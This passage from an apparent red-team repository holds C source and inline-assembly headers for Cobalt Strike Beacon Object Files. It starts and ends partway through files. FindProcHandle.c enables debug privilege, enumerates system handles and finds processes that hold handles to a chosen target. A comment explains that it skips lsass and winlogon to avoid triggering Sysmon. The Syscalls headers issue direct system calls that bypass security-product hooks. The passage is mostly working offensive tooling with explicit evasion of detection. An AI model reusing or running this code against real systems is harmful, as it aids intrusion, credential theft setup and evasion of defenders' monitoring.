	OUT PULONG64 NumberOfBytesRead
	);


================================================
FILE: Process-BOF/findobjects/FindProcHandle.c
================================================
#include <windows.h>
#include <stdio.h>

#if defined(WOW64)
#include "Syscalls-WoW64.h"
#else
#include "Syscalls.h"
#endif

#include "FindObjects.h"
#include "beacon.h"

INT iGarbage = 1;
LPSTREAM lpStream = (LPSTREAM)1;

HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
	HRESULT hr = S_OK;
	va_list argList;
	WCHAR chBuffer[1024];
	DWORD dwWritten = 0;

	if (lpStream <= (LPSTREAM)1) {
		hr = OLE32$CreateStreamOnHGlobal(NULL, TRUE, &lpStream);
		if (FAILED(hr)) {
			return hr;
		}
	}

	va_start(argList, lpwFormat);
	MSVCRT$memset(chBuffer, 0, sizeof(chBuffer));
	if (!MSVCRT$_vsnwprintf_s(chBuffer, _countof(chBuffer), _TRUNCATE, lpwFormat, argList)) {
		hr = E_FAIL;
		goto CleanUp;
	}

	if (FAILED(hr = lpStream->lpVtbl->Write(lpStream, chBuffer, (ULONG)MSVCRT$wcslen(chBuffer) * sizeof(WCHAR), &dwWritten))) {
		goto CleanUp;
	}

CleanUp:

	va_end(argList);
	return hr;
}

VOID BeaconOutputStreamW() {
	STATSTG ssStreamData = { 0 };
	SIZE_T cbSize = 0;
	ULONG cbRead = 0;
	LARGE_INTEGER pos;
	LPWSTR lpwOutput = NULL;

	if (FAILED(lpStream->lpVtbl->Stat(lpStream, &ssStreamData, STATFLAG_NONAME))) {
		return;
	}

	cbSize = ssStreamData.cbSize.LowPart;
	lpwOutput = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, cbSize + 1);
	if (lpwOutput != NULL) {
		pos.QuadPart = 0;
		if (FAILED(lpStream->lpVtbl->Seek(lpStream, pos, STREAM_SEEK_SET, NULL))) {
			goto CleanUp;
		}

		if (FAILED(lpStream->lpVtbl->Read(lpStream, lpwOutput, (ULONG)cbSize, &cbRead))) {		
			goto CleanUp;
		}

		BeaconPrintf(CALLBACK_OUTPUT, "%ls", lpwOutput);
	}

CleanUp:

	if (lpStream != NULL) {
		lpStream->lpVtbl->Release(lpStream);
		lpStream = NULL;
	}

	if (lpwOutput != NULL) {
		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, lpwOutput);
	}

	return;
}

BOOL IsElevated() {
	BOOL fRet = FALSE;
	HANDLE hToken = NULL;

	_NtOpenProcessToken NtOpenProcessToken = (_NtOpenProcessToken)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtOpenProcessToken");
	if (NtOpenProcessToken == NULL) {
		return FALSE;
	}

	NTSTATUS status = NtOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY, &hToken);
	if (status == STATUS_SUCCESS) {
		TOKEN_ELEVATION Elevation = { 0 };
		ULONG ReturnLength;

		status = ZwQueryInformationToken(hToken, TokenElevation, &Elevation, sizeof(Elevation), &ReturnLength);
		if (status == STATUS_SUCCESS) {
			fRet = Elevation.TokenIsElevated;
		}
	}

	if (hToken != NULL) {
		ZwClose(hToken);
	}

	return fRet;
}

BOOL SetDebugPrivilege() {
	HANDLE hToken = NULL;
	TOKEN_PRIVILEGES TokenPrivileges = { 0 };

	_NtOpenProcessToken NtOpenProcessToken = (_NtOpenProcessToken)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtOpenProcessToken");
	if (NtOpenProcessToken == NULL) {
		return FALSE;
	}

	NTSTATUS status = NtOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	TokenPrivileges.PrivilegeCount = 1;
	TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	LPCWSTR lpwPriv = L"SeDebugPrivilege";
	if (!ADVAPI32$LookupPrivilegeValueW(NULL, lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
		ZwClose(hToken);
		return FALSE;
	}

	status = ZwAdjustPrivilegesToken(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
	if (status != STATUS_SUCCESS) {
		ZwClose(hToken);
		return FALSE;
	}

	ZwClose(hToken);

	return TRUE;
}

LPWSTR WINAPI PathFindFileNameW(LPCWSTR lpszPath) {
	LPCWSTR lastSlash = lpszPath;

	while (lpszPath && *lpszPath)
	{
		if ((*lpszPath == '\\' || *lpszPath == '/' || *lpszPath == ':') &&
			lpszPath[1] && lpszPath[1] != '\\' && lpszPath[1] != '/')
			lastSlash = lpszPath + 1;
		lpszPath++;
	}
	return (LPWSTR)lastSlash;
}

ULONG GetPid(LPCWSTR lpwProcName) {
	NTSTATUS status;
	PSYSTEM_PROCESSES pProcInfo = NULL;
	LPVOID pProcInfoBuffer = NULL;
	SIZE_T procInfoSize = 0x10000;
	UNICODE_STRING uProcName;
	ULONG ulPid = 0;
	ULONG uReturnLength = 0;

	_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");
	if (RtlInitUnicodeString == NULL) {
		return 0;
	}

	_RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlEqualUnicodeString");
	if (RtlEqualUnicodeString == NULL) {
		return 0;
	}

	do {
		pProcInfoBuffer = NULL;
		status = ZwAllocateVirtualMemory(NtCurrentProcess(), &pProcInfoBuffer, 0, &procInfoSize, MEM_COMMIT, PAGE_READWRITE);
		if (status != STATUS_SUCCESS) {
			return 0;
		}

		status = ZwQuerySystemInformation(SystemProcessInformation, pProcInfoBuffer, (ULONG)procInfoSize, &uReturnLength);
		if (status == STATUS_INFO_LENGTH_MISMATCH) {
			ZwFreeVirtualMemory(NtCurrentProcess(), &pProcInfoBuffer, &procInfoSize, MEM_RELEASE);
			procInfoSize += uReturnLength;
		}

	} while (status != STATUS_SUCCESS);

	RtlInitUnicodeString(&uProcName, lpwProcName);

	pProcInfo = (PSYSTEM_PROCESSES)pProcInfoBuffer;
	do {
		pProcInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pProcInfo) + pProcInfo->NextEntryDelta);

		if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &uProcName, TRUE)) {
			ulPid = (DWORD)(DWORD_PTR)pProcInfo->ProcessId;
			break;
		}

		if (pProcInfo->NextEntryDelta == 0) {
			break;
		}

	} while (pProcInfo && pProcInfo->NextEntryDelta);

	if (pProcInfoBuffer != NULL) {
		ZwFreeVirtualMemory(NtCurrentProcess(), &pProcInfoBuffer, &procInfoSize, MEM_RELEASE);
	}

	return ulPid;
}

BOOL EnumObjectHandles(HANDLE hProcess, PSYSTEM_HANDLE pObjHandle, LPCWSTR lpwHandleName, LPWSTR lpwProcName, ULONG ulPid) {
	NTSTATUS status;
	BOOL bResult = FALSE;
	HANDLE dupObjHandle = NULL;
	POBJECT_TYPE_INFORMATION objectTypeInfo = NULL;
	SIZE_T objectInfoSize = 0x10000;
	UNICODE_STRING uProcess;
	BYTE OutputBuffer[2048] = { 0 };
	LPWSTR lpwFileName = NULL;
	ULONG uReturnLength = 0;

	_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");
	if (RtlInitUnicodeString == NULL) {
		return FALSE;
	}

	_RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlEqualUnicodeString");
	if (RtlEqualUnicodeString == NULL) {
		return FALSE;
	}

	status = ZwDuplicateObject(hProcess, (HANDLE)(DWORD_PTR)pObjHandle->Handle, NtCurrentProcess(), &dupObjHandle, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, 0);
	if (status != STATUS_SUCCESS) {
		return FALSE;
	}

	if (pObjHandle->GrantedAccess == 0x0012019f) {
		ZwClose(dupObjHandle);
		return FALSE;
	}

	do {
		objectTypeInfo = NULL;
		status = ZwAllocateVirtualMemory(NtCurrentProcess(), (PVOID*)&objectTypeInfo, 0, &objectInfoSize, MEM_COMMIT, PAGE_READWRITE);
		if (status != STATUS_SUCCESS) {
			ZwClose(dupObjHandle);
			return FALSE;
		}

		status = ZwQueryObject(dupObjHandle, ObjectTypeInformation, objectTypeInfo, uReturnLength, &uReturnLength);
		if (status == STATUS_INFO_LENGTH_MISMATCH) {
			ZwFreeVirtualMemory(NtCurrentProcess(), (PVOID*)&objectTypeInfo, &objectInfoSize, MEM_RELEASE);
			objectInfoSize += uReturnLength;
		}
	} while (status != STATUS_SUCCESS);

	RtlInitUnicodeString(&uProcess, L"Process");

	if (RtlEqualUnicodeString(&objectTypeInfo->Name, &uProcess, TRUE)) {
		status = ZwQueryInformationProcess(dupObjHandle, ProcessImageFileName, OutputBuffer, sizeof(OutputBuffer), &uReturnLength);
		if (status == STATUS_SUCCESS) {
			PUNICODE_STRING uFileName = (PUNICODE_STRING)OutputBuffer;
			lpwFileName = PathFindFileNameW((LPWSTR)uFileName->Buffer);

			if (MSVCRT$_wcsicmp(lpwFileName, lpwHandleName) == 0) {
				BeaconPrintToStreamW(
				    L"[+] ProcessName: %ls\n"
				    "    ProcessID:   %lu\n" 
				    "    Handle:      0x%x\n"
				    "    HandleType:  %wZ\n"
				    "    HandleName:  %ls\n\n", lpwProcName ,ulPid, pObjHandle->Handle, &objectTypeInfo->Name, lpwFileName);

				bResult = TRUE;
			}
		}
	}

	if (objectTypeInfo != NULL) {
		status = ZwFreeVirtualMemory(NtCurrentProcess(), (PVOID*)&objectTypeInfo, &objectInfoSize, MEM_RELEASE);
	}

	if (dupObjHandle != NULL) {
		ZwClose(dupObjHandle);
	}

	return bResult;
}


VOID go(IN PCHAR Args, IN ULONG Length) 
{
	NTSTATUS status;
	BOOL bResult = FALSE;
	ULONG ulProcId = 0;
	PSYSTEM_HANDLE_INFORMATION pHandleInfo = NULL;
	ULONG ulLsassPid = 0;
	ULONG ulWinlogonPid = 0;
	LPVOID pHandleInfoBuffer = NULL;
	SIZE_T handleInfoSize = 0x10000;
	BYTE OutputBuffer[2048] = { 0 };
	LPWSTR lpwHandleName = NULL;
	LPWSTR lpwProcName = NULL;
	ULONG uReturnLength = 0;
	ULONG i = 0;

	// Parse Arguments
	datap parser;
	BeaconDataParse(&parser, Args, Length);
	lpwHandleName = (LPWSTR)BeaconDataExtract(&parser, NULL);

	if (lpwHandleName == NULL) {
		BeaconPrintf(CALLBACK_ERROR, "Invalid argument...\n");
		return;
	}

	_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");
	if (RtlInitUnicodeString == NULL) {
		return;
	}

	_RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlEqualUnicodeString");
	if (RtlEqualUnicodeString == NULL) {
		return;
	}

	if (IsElevated()) {
		SetDebugPrivilege();
	}

	ulProcId = GetPid(lpwHandleName);
	if (ulProcId == 0) {
		BeaconPrintf(CALLBACK_ERROR, "Failed to obtain ProcessId...\n");
		return;
	}

	ulLsassPid = GetPid(L"lsass.exe");
	ulWinlogonPid = GetPid(L"winlogon.exe");

	do {
		pHandleInfoBuffer = NULL;
		status = ZwAllocateVirtualMemory(NtCurrentProcess(), &pHandleInfoBuffer, 0, &handleInfoSize, MEM_COMMIT, PAGE_READWRITE);
		if (status != STATUS_SUCCESS) {
			return;
		}

		status = ZwQuerySystemInformation(SystemHandleInformation, pHandleInfoBuffer, (ULONG)handleInfoSize, &uReturnLength);
		if (status == STATUS_INFO_LENGTH_MISMATCH) {
			ZwFreeVirtualMemory(NtCurrentProcess(), &pHandleInfoBuffer, &handleInfoSize, MEM_RELEASE);
			handleInfoSize += uReturnLength;
		}

	} while (status != STATUS_SUCCESS);

	pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)pHandleInfoBuffer;
	for (i = 0; i < pHandleInfo->HandleCount; i++) {
		SYSTEM_HANDLE objHandle = pHandleInfo->Handles[i];

		// Ignore System handles
		if (objHandle.ProcessId == 4) {
			continue;
		}

		if (objHandle.ProcessId == ulProcId) {
			continue;
		}

		// Don't trigger sysmon by touching lsass or winlogon
		if ((objHandle.ProcessId == ulLsassPid) || (objHandle.ProcessId == ulWinlogonPid)) {
			continue;
		}

		HANDLE hProcess = NULL;
		OBJECT_ATTRIBUTES ObjectAttributes;
		InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
		CLIENT_ID uPid = { 0 };

		uPid.UniqueProcess = (HANDLE)(DWORD_PTR)objHandle.ProcessId;
		uPid.UniqueThread = (HANDLE)0;

		NTSTATUS status = ZwOpenProcess(&hProcess, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_DUP_HANDLE, &ObjectAttributes, &uPid);
		if (hProcess != NULL) {
			status = ZwQueryInformationProcess(hProcess, ProcessImageFileName, OutputBuffer, sizeof(OutputBuffer), &uReturnLength);
			if (status == STATUS_SUCCESS) {
				PUNICODE_STRING uProcName = (PUNICODE_STRING)OutputBuffer;
				lpwProcName = PathFindFileNameW((LPWSTR)uProcName->Buffer);
				if (EnumObjectHandles(hProcess, &objHandle, lpwHandleName, lpwProcName, objHandle.ProcessId)) {
					bResult = TRUE;
				}
			}
			ZwClose(hProcess);
		}
	}

	if (bResult) {
		//Print final Output
		BeaconOutputStreamW();
	}
	else{
		BeaconPrintf(CALLBACK_OUTPUT,"[!] No matching process handles found.");
	}

	if (pHandleInfoBuffer) {
		status = ZwFreeVirtualMemory(NtCurrentProcess(), &pHandleInfoBuffer, &handleInfoSize, MEM_RELEASE);
	}

	return;
}


================================================
FILE: Process-BOF/findobjects/Syscalls-WoW64.h
================================================
#pragma once

// This function expects a syscall number in eax and will increment it once for every mayor version
// Note, this function will not work for all systemcalls. Only for most of them.
// Example:
// mov eax, 0x23                               ; Win 6.1 = 0x23, 6.2 = 0x24, 6.3 = 0x25, 10 = 0x26
// call ExecuteSimpleSystemCallBase

__asm__("ExecuteSimpleSystemCallBase:                     \n\
    pop ecx                                               \n\
    push ebp                                              \n\
    mov ebp, esp                                          \n\
    mov ecx, fs:[0x30]                                    \n\
ExecuteSimpleSystemCallBase_Check_X_X_XXXX:               \n\
    cmp word ptr [ecx+0x0A4], 10                          \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX  \n\
    cmp word ptr [ecx+0x0A4], 6                           \n\
    jne  ExecuteSimpleSystemCallBase_Epilogue             \n\
ExecuteSimpleSystemCallBase_Check_6_X_XXXX:               \n\
    cmp word ptr [ecx+0x0A8], 3                           \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX   \n\
    cmp word ptr [ecx+0x0A8], 2                           \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX   \n\
    cmp word ptr [ecx+0x0A8], 1                           \n\
    jne  ExecuteSimpleSystemCallBase_Epilogue             \n\
    cmp word ptr [ecx+0x0AC], 7601                        \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_6_1_7601   \n\
    jmp ExecuteSimpleSystemCallBase_Epilogue              \n\
ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX:         \n\
    inc eax                                               \n\
ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX:          \n\
    inc eax                                               \n\
ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX:          \n\
    inc eax                                               \n\
ExecuteSimpleSystemCallBase_SystemCall_6_1_7601:          \n\
ExecuteSimpleSystemCallBase_Argument_Count:               \n\
    mov ecx, 0x10                                         \n\
ExecuteSimpleSystemCallBase_Push_Argument:                \n\
    dec ecx                                               \n\
    push [ebp + 0x08 + ecx * 4]                           \n\
    jnz ExecuteSimpleSystemCallBase_Push_Argument         \n\
    lea ebx,[ExecuteSimpleSystemCallBase_Epilogue]        \n\
    push ebx                                              \n\
    call dword ptr fs:[0x0C0]                             \n\
    lea esp, [esp+4]                                      \n\
ExecuteSimpleSystemCallBase_Epilogue:                     \n\
    mov esp, ebp                                          \n\
    pop ebp                                               \n\
    ret                                                   \n\
    ");

__asm__("ZwQuerySystemInformation:                        \n\
    mov eax, 0x033                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwQueryInformationProcess:                       \n\
    mov eax, 0x016                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwOpenProcess:                                   \n\
    mov eax, 0x023                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwAdjustPrivilegesToken:                         \n\
    mov eax, 0x03E                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwQueryInformationToken:                         \n\
    mov eax, 0x01E                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwAllocateVirtualMemory:                         \n\
    mov eax, 0x015                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwFreeVirtualMemory:                             \n\
    mov eax, 0x01B                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwReadVirtualMemory:                             \n\
    mov eax, 0x03C                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwWriteVirtualMemory:                            \n\
    mov eax, 0x037                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwDuplicateObject:                               \n\
    mov eax, 0x039                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwQueryObject:                                   \n\
    mov eax, 0x00d                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwClose:                                         \n\
    mov eax, 0x00C                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");


================================================
FILE: Process-BOF/findobjects/Syscalls.h
================================================
#pragma once

// This function expects a syscall number in eax and will increment it once for every mayor version
// Note, this function will not work for all systemcalls. Only for most of them.
// Example:
// mov rax, 0x23                               ; Win 6.1 = 0x23, 6.2 = 0x24, 6.3 = 0x25, 10 = 0x26
// call ExecuteSimpleSystemCallBase

__asm__("ExecuteSimpleSystemCallBase:                     \n\
    mov r10, gs:[0x60]                                    \n\
ExecuteSimpleSystemCallBase_Check_X_X_XXXX:               \n\
    cmp dword ptr [r10+0x118], 10                         \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX  \n\
    cmp dword ptr [r10+0x118], 6                          \n\
    jne ExecuteSimpleSystemCallBase_SystemCall_Unknown    \n\
ExecuteSimpleSystemCallBase_Check_6_X_XXXX:               \n\
    cmp dword ptr [r10+0x11c], 3                          \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX   \n\
    cmp dword ptr [r10+0x11c], 2                          \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX   \n\
    cmp dword ptr [r10+0x11c], 1                          \n\
    jne ExecuteSimpleSystemCallBase_SystemCall_Unknown    \n\
ExecuteSimpleSystemCallBase_Check_6_1_XXXX:               \n\
    cmp dword ptr [r10+0x120], 7601                       \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_6_1_7601   \n\
    jmp ExecuteSimpleSystemCallBase_SystemCall_Unknown    \n\
ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX:         \n\
    inc eax                                               \n\
ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX:          \n\
    inc eax                                               \n\
ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX:          \n\
    inc eax                                               \n\
ExecuteSimpleSystemCallBase_SystemCall_6_1_7601:          \n\
ExecuteSimpleSystemCallBase_Epilogue:                     \n\
    pop r10                                               \n\
    mov r10, rcx                                          \n\
    syscall                                               \n\
ExecuteSimpleSystemCallBase_Finished:                     \n\
ExecuteSimpleSystemCallBase_SystemCall_Unknown:           \n\
    ret                                                   \n\
    ");

__asm__("ZwQuerySystemInformation:                        \n\
    mov rax, 0x033                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwQueryInformationProcess:                       \n\
    mov rax, 0x016                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwOpenProcess:                                   \n\
    mov rax, 0x023                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwAdjustPrivilegesToken:                         \n\
    mov rax, 0x03E                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwQueryInformationToken:                         \n\
    mov rax, 0x01E                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwAllocateVirtualMemory:                         \n\
    mov rax, 0x015                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwFreeVirtualMemory:                             \n\
    mov rax, 0x01B                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwReadVirtualMemory:                             \n\
    mov rax, 0x03C                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwWriteVirtualMemory:                            \n\
    mov rax, 0x037                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwDuplicateObject:                               \n\
    mov rax, 0x039                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwQueryObject:                                   \n\
    mov rax, 0x00d                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwClose:                                         \n\
    mov rax, 0x00C                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");


================================================
FILE: Process-BOF/process/Syscalls-WoW64.h
================================================
#pragma once

// This function expects a syscall number in eax and will increment it once for every mayor version
// Note, this function will not work for all systemcalls. Only for most of them.
// Example:
// mov eax, 0x23                               ; Win 6.1 = 0x23, 6.2 = 0x24, 6.3 = 0x25, 10 = 0x26
// call ExecuteSimpleSystemCallBase

__asm__("ExecuteSimpleSystemCallBase:                     \n\
    pop ecx                                               \n\
    push ebp                                              \n\
    mov ebp, esp                                          \n\
    mov ecx, fs:[0x30]                                    \n\
ExecuteSimpleSystemCallBase_Check_X_X_XXXX:               \n\
    cmp word ptr [ecx+0x0A4], 10                          \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX  \n\
    cmp word ptr [ecx+0x0A4], 6                           \n\
    jne  ExecuteSimpleSystemCallBase_Epilogue             \n\
ExecuteSimpleSystemCallBase_Check_6_X_XXXX:               \n\
    cmp word ptr [ecx+0x0A8], 3                           \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX   \n\
    cmp word ptr [ecx+0x0A8], 2                           \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX   \n\
    cmp word ptr [ecx+0x0A8], 1                           \n\
    jne  ExecuteSimpleSystemCallBase_Epilogue             \n\
    cmp word ptr [ecx+0x0AC], 7601                        \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_6_1_7601   \n\
    jmp ExecuteSimpleSystemCallBase_Epilogue              \n\
ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX:         \n\
    inc eax                                               \n\
ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX:          \n\
    inc eax                                               \n\
ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX:          \n\
    inc eax                                               \n\
ExecuteSimpleSystemCallBase_SystemCall_6_1_7601:          \n\
ExecuteSimpleSystemCallBase_Argument_Count:               \n\
    mov ecx, 0x10                                         \n\
ExecuteSimpleSystemCallBase_Push_Argument:                \n\
    dec ecx                                               \n\
    push [ebp + 0x08 + ecx * 4]                           \n\
    jnz ExecuteSimpleSystemCallBase_Push_Argument         \n\
    lea ebx,[ExecuteSimpleSystemCallBase_Epilogue]        \n\
    push ebx                                              \n\
    call dword ptr fs:[0x0C0]                             \n\
    lea esp, [esp+4]                                      \n\
ExecuteSimpleSystemCallBase_Epilogue:                     \n\
    mov esp, ebp                                          \n\
    pop ebp                                               \n\
    ret                                                   \n\
    ");

__asm__("ZwQuerySystemInformation:                        \n\
    mov eax, 0x033                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwQueryInformationProcess:                       \n\
    mov eax, 0x016                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwOpenProcess:                                   \n\
    mov eax, 0x023                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwAdjustPrivilegesToken:                         \n\
    mov eax, 0x03E                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwQueryInformationToken:                         \n\
    mov eax, 0x01E                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwAllocateVirtualMemory:                         \n\
    mov eax, 0x015                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwFreeVirtualMemory:                             \n\
    mov eax, 0x01B                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwReadVirtualMemory:                             \n\
    mov eax, 0x03C                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwWriteVirtualMemory:                            \n\
    mov eax, 0x037                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwCreateFile:                                    \n\
    mov eax, 0x052                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwClose:                                         \n\
    mov eax, 0x00C                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");


================================================
FILE: Process-BOF/process/Syscalls.h
================================================
#pragma once

// This function expects a syscall number in eax and will increment it once for every mayor version
// Note, this function will not work for all systemcalls. Only for most of them.
// Example:
// mov rax, 0x23                               ; Win 6.1 = 0x23, 6.2 = 0x24, 6.3 = 0x25, 10 = 0x26
// call ExecuteSimpleSystemCallBase

__asm__("ExecuteSimpleSystemCallBase:                     \n\
    mov r10, gs:[0x60]                                    \n\
ExecuteSimpleSystemCallBase_Check_X_X_XXXX:               \n\
    cmp word ptr [r10+0x118], 10                          \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX  \n\
    cmp word ptr [r10+0x118], 6                           \n\
    jne ExecuteSimpleSystemCallBase_SystemCall_Unknown    \n\
ExecuteSimpleSystemCallBase_Check_6_X_XXXX:               \n\
    cmp word ptr [r10+0x11c], 3                           \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX   \n\
    cmp word ptr [r10+0x11c], 2                           \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX   \n\
    cmp word ptr [r10+0x11c], 1                           \n\
    jne ExecuteSimpleSystemCallBase_SystemCall_Unknown    \n\
ExecuteSimpleSystemCallBase_Check_6_1_XXXX:               \n\
    cmp word ptr [r10+0x120], 7601                        \n\
    je  ExecuteSimpleSystemCallBase_SystemCall_6_1_7601   \n\
    jmp ExecuteSimpleSystemCallBase_SystemCall_Unknown    \n\
ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX:         \n\
    inc eax                                               \n\
ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX:          \n\
    inc eax                                               \n\
ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX:          \n\
    inc eax                                               \n\
ExecuteSimpleSystemCallBase_SystemCall_6_1_7601:          \n\
ExecuteSimpleSystemCallBase_Epilogue:                     \n\
    pop r10                                               \n\
    mov r10, rcx                                          \n\
    syscall                                               \n\
ExecuteSimpleSystemCallBase_Finished:                     \n\
ExecuteSimpleSystemCallBase_SystemCall_Unknown:           \n\
    ret                                                   \n\
    ");

__asm__("ZwQuerySystemInformation:                        \n\
    mov rax, 0x033                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwQueryInformationProcess:                       \n\
    mov rax, 0x016                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwOpenProcess:                                   \n\
    mov rax, 0x023                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwAdjustPrivilegesToken:                         \n\
    mov rax, 0x03E                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwQueryInformationToken:                         \n\
    mov rax, 0x01E                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwAllocateVirtualMemory:                         \n\
    mov rax, 0x015                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwFreeVirtualMemory:                             \n\
    mov rax, 0x01B                                        \n\
    call ExecuteSimpleSystemCallBase                      \n\
    ret                                                   \n\
    ");

__asm__("ZwReadVirtualMemory:                             \n\
